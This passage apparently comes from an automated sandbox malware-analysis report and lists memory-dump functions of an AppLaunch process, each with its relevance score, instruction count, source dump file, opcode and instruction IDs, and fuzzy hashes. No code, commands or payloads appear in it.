                                                                                                                                                                                              • Instruction ID: e094197be896d43d05171c707b8bede64f8d2998477587bb8f19dbd00794d359
                                                                                                                                                                                              • Opcode Fuzzy Hash: 205cd8be274312c5d3a6c99ca0259cb8dd530b3d1fcb32d79661d4094ff9b2eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77D1D774E01219CFDB54DFA8C984B9DBBB2BF49304F1085A9D409AB3A5DB70AD85CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CD420 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b9222af246dadc78959131f8401bdf2a92d47f4a3a7a928459b884c9f4386dba
                                                                                                                                                                                              • Instruction ID: cfd670f1fd52a85e455c554b4e0b3d6dfaf2943739b0ee2401418c14209104f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9222af246dadc78959131f8401bdf2a92d47f4a3a7a928459b884c9f4386dba
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29A100347012069BCB14EB79D85466EBBE3EFC0320F54C96ED9168B296EF35AC05C791
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05748167 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e847ca929608d74a645a3ce6524368d1373964087ce7835d00e0903251ae7ecf
                                                                                                                                                                                              • Instruction ID: c8cd3cef94fe9ba80f96dc61ae4441d79b6a7bbc17d9751c30a5b9d0a15f7dec
                                                                                                                                                                                              • Opcode Fuzzy Hash: e847ca929608d74a645a3ce6524368d1373964087ce7835d00e0903251ae7ecf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66B1183490130DCFCB14DFB8D4989ADBBB2FF8A311F50816AE416AB2A1DB319945DF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916AEA0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 95a423bc6da680b0bec26e4be10bd9a7c17f22a33709e46341bfffffdb3b846a
                                                                                                                                                                                              • Instruction ID: 9d7d9495c7f8aab9bcd4075380921ca2bc1e9d8a0ceda75c408c66b764fe51e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a423bc6da680b0bec26e4be10bd9a7c17f22a33709e46341bfffffdb3b846a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CA19F30E00208DFCB14DFA9C45469EBBF2FF89314F14855DE589AB3A1EB319941CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916D400 Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b0256309b298a72ea1b95dfebcdc6f7c6a12536c3f99973ac81eda08bddf97e3
                                                                                                                                                                                              • Instruction ID: b57094dd3329336af5fe0d055cb84c584ca45f7d48c54236c18fbca5c6d264af
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0256309b298a72ea1b95dfebcdc6f7c6a12536c3f99973ac81eda08bddf97e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB1C574E01218CFCB68DFA8D894B9DBBB2BF89304F2081A9D409AB355DB359D85CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916DDE0 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7897f12889650e2d4033bc1d99bf0fb56884e5562f901000d00129b36635810a
                                                                                                                                                                                              • Instruction ID: 2c0f11974f7b00f7e2f9c7675e3914faf7005b0c062b4edea7979ee61e636f1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7897f12889650e2d4033bc1d99bf0fb56884e5562f901000d00129b36635810a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34B1E574E00228CFDB64DFA9D944B9DBBB2BF89300F1081AAD449BB395DB315995CF11
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05748178 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6fab8791849eaf56c5b9f30508018ee9191098ae9554f2fd17e4aa4f06d0ed84
                                                                                                                                                                                              • Instruction ID: 9ce2ba9e1f4aac297093fe67abf293a164dc475770e5533f367f57effed32b90
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fab8791849eaf56c5b9f30508018ee9191098ae9554f2fd17e4aa4f06d0ed84
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55A1F73490130DCFCB14EFB8D4589ADBBB2FF8A311F50856AE416AB2A4DB319945CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C0040 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d3e98ad5c99ccda2f61e47afcd0a170524b7067d53882c50c97e7e6a2c19d395
                                                                                                                                                                                              • Instruction ID: d37c52fa53c633f4cc052a2bb05b7981d46c6e11ba445ae59896946eac052375
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3e98ad5c99ccda2f61e47afcd0a170524b7067d53882c50c97e7e6a2c19d395
                                                                                                                                                                                              • Instruction Fuzzy Hash: C181B330B012099FCB54EB78D4552AEBBF2EF85300F6484ADD849EB386DE349D01C792
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C9CE0 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b653c1cd8084f0b2bce65b78b3ce5f819b9859a2f22dda3d92dde4bfcfd46631
                                                                                                                                                                                              • Instruction ID: d342c5dbfee8df828dfbd5415357354963dffb75c3bad405f9de2a056ab18540
                                                                                                                                                                                              • Opcode Fuzzy Hash: b653c1cd8084f0b2bce65b78b3ce5f819b9859a2f22dda3d92dde4bfcfd46631
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC917134B012058FDB14DF68D884AAEBFF2EF88315F14846DE805AB392DB74AD05CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C4608 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4f9c17c3f3223aca8d5dc68f4c4bc75769f0f13a44ec5859d3682d2563b96ce4
                                                                                                                                                                                              • Instruction ID: e0e1c722e506483e3324a32759809cb762fff8e440d714acdee7d2bbbaf4385c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f9c17c3f3223aca8d5dc68f4c4bc75769f0f13a44ec5859d3682d2563b96ce4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75915D38A00249CFDB54DFA4D4986ADBFF2FF88310F54855EE406AB395DB34A845DB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C8DD8 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0832f73721d0220b8af7c8524a5939de9e479eada4c525178d481d836561b130
                                                                                                                                                                                              • Instruction ID: 4a706ddf9f4c0013726810c1fc6a6ec9dbb8b223c1eeadc25c8f323c1c6c5764
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0832f73721d0220b8af7c8524a5939de9e479eada4c525178d481d836561b130
                                                                                                                                                                                              • Instruction Fuzzy Hash: 36915A34B006049FCB14DF74D99896EBBF2FF88311B548969E84A9B396DB34EC45CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E0421 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0f8e90134d384afd45e07d6f23d5a5152663f4904c66f6ab692ad6a93f4eb9c3
                                                                                                                                                                                              • Instruction ID: bc29e4dbc19cbfd280392d61237d73adde502aefa800ebc53786ff291982d93e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8e90134d384afd45e07d6f23d5a5152663f4904c66f6ab692ad6a93f4eb9c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51FF75B012018FCB559B7C94A463B7BF2EBC9351758847AE80ACB386EA34DC06C792
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E18F4 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: efcd90f1f8a5caae3ce70ddd9d67c9edc304d7d08b658a3ffb18be271faf6784
                                                                                                                                                                                              • Instruction ID: 28816eb00f4fe61006d6ba829c54ba696204ca300857da752d461190a6275ecc
                                                                                                                                                                                              • Opcode Fuzzy Hash: efcd90f1f8a5caae3ce70ddd9d67c9edc304d7d08b658a3ffb18be271faf6784
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D715A347012018FCB44DF78D498A6E7BF2EF89315B5485AAE84ADB3A6DA309C05CB51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09168BEA Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 159c1612aef0cde495428625e767b5eef1cf1cf32f2be6a37afc1e99b5e7f38e
                                                                                                                                                                                              • Instruction ID: 4cf0e7effdc60f91e5f41254a079c58a576b6d8af0871709fd76b08ad5b561ce
                                                                                                                                                                                              • Opcode Fuzzy Hash: 159c1612aef0cde495428625e767b5eef1cf1cf32f2be6a37afc1e99b5e7f38e
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7718F75E00208CFCB10DFA8C9446DEBBF6EF49308F25859AD449AB261EB71A945CF91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574446B Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5bc2b7181bbc408f9d1299b3480dc36b72efabd088303adf3be126127dd96e75
                                                                                                                                                                                              • Instruction ID: 5488c7158f63420b2b41bda29fcca5f79e5d5cfef277ad3cc2571569e3d95c22
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bc2b7181bbc408f9d1299b3480dc36b72efabd088303adf3be126127dd96e75
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F918C78E05219CFDF60CFA8D885B9DBBB2FB48310F20819AD819A7394DB315A85DF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05746128 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4616f7f6195e6d175db0b196c9fb868a5d6a70a6bf344110809fce6b9ccc7554
                                                                                                                                                                                              • Instruction ID: 4b32956a40c1c3898f60c05bb420eec41e78504d5d4a0285b9c6df47d07a431c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4616f7f6195e6d175db0b196c9fb868a5d6a70a6bf344110809fce6b9ccc7554
                                                                                                                                                                                              • Instruction Fuzzy Hash: 035146327042486FCB059E69D811B7F3BABEBC6364F18406AE909DB381DF359C0597A6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05744478 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6def448dfe12634246ff901522e2ed224f05bcdf9ba301ff2747a792587bfe0d
                                                                                                                                                                                              • Instruction ID: eb527136d8cb2781988f96d21ed7a25edbd802e4f748a3ce23ab015da049f109
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6def448dfe12634246ff901522e2ed224f05bcdf9ba301ff2747a792587bfe0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6917B78E01219CFDB60CFA8D995BADBBB2FB48310F20819AD809A7354DB315E85DF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 057412F7 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 193ce6f26621e00d2a5cf4892db1af29c32dd2b0ba447d720efb5d6c66fd8b06
                                                                                                                                                                                              • Instruction ID: 8184817e787a380636ec52e191f7b2151ab1db885312ec700a08c5db9e3076a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 193ce6f26621e00d2a5cf4892db1af29c32dd2b0ba447d720efb5d6c66fd8b06
                                                                                                                                                                                              • Instruction Fuzzy Hash: C971A474E00219CFDB08DFE9C894AAEBBF2BF88304F14852AE915AB355DB359945CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CB3A8 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 79a252676c038c1a44da05e883f85923f5d69ca21d61c207cf7634bc336db112
                                                                                                                                                                                              • Instruction ID: ba9ef493456e0861c5bcdca895cfd85841402c066dce9cf5c22761e2685a65af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a252676c038c1a44da05e883f85923f5d69ca21d61c207cf7634bc336db112
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE5103357043148FCB149B79A4596AEBBF2EFC9322B14847EE906C7382DE35D805CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E3298 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4473c7a93bc2d5b3e7f6e92ae59d10aab95e65fe350219953e6d0ab67fdff6ac
                                                                                                                                                                                              • Instruction ID: a9c5aca2c0688e008d0702c7733b2c775a95f900979aaa507b49c9e7ddfdef3d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4473c7a93bc2d5b3e7f6e92ae59d10aab95e65fe350219953e6d0ab67fdff6ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01713E71A00B0ACFCB11EF68C550599FBF1FF89314F118A5AE559AB251EB30FA85CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E1718 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ac91652ab02d3b067518f46a8a5c827f19a87a33159082485309e69c5918b66a
                                                                                                                                                                                              • Instruction ID: 68a0f0522ac953cc6d6472a8ed77f3cd6250e03147ff9c67273b76523e3478b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: ac91652ab02d3b067518f46a8a5c827f19a87a33159082485309e69c5918b66a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E551E139B002058FCB24DB78C89096BBBF6EFC8360714802DE94AD7352EA31EC11C791
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916D912 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0b320a035a52822bd9cd884edb45ab947cb7064d9772721897c337290d7fc0dc
                                                                                                                                                                                              • Instruction ID: 37a7e9fa5cc0e0b1b183c29daa152c9408b0813ff6fffb345b997b3374029593
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b320a035a52822bd9cd884edb45ab947cb7064d9772721897c337290d7fc0dc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A61B474E05318CFDB68DFA9D984B9DBBB2BF89304F1080AAD409AB361DB315981CF41
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E3295 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c2014ec1e91cbe735d185d8813730862e022c2b215d63090309851fce8735efb
                                                                                                                                                                                              • Instruction ID: 1474f164b34599ccfd5225f3fbde6291c15b6156d8c4f4ee9d4f487f7e24dbd4
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2014ec1e91cbe735d185d8813730862e022c2b215d63090309851fce8735efb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43611D71A0075A8FCB11EF79C550999BFF1FF89304F11865AE459AB211EB70FA85CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05747F58 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7f77660a3dc0381d06445d365c7dfa4f3ee033862fdff6d92a6f23818c3fc91a
                                                                                                                                                                                              • Instruction ID: b2ebe84b4b878b5258034b5eae38afb5904575dc7a9b2aa2490adefef36f6bc7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f77660a3dc0381d06445d365c7dfa4f3ee033862fdff6d92a6f23818c3fc91a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0451C074E01208DFCB18DFA9D9449ADBBB2FF88311F60852EE815AB355DB315846CF11
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C9C00 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
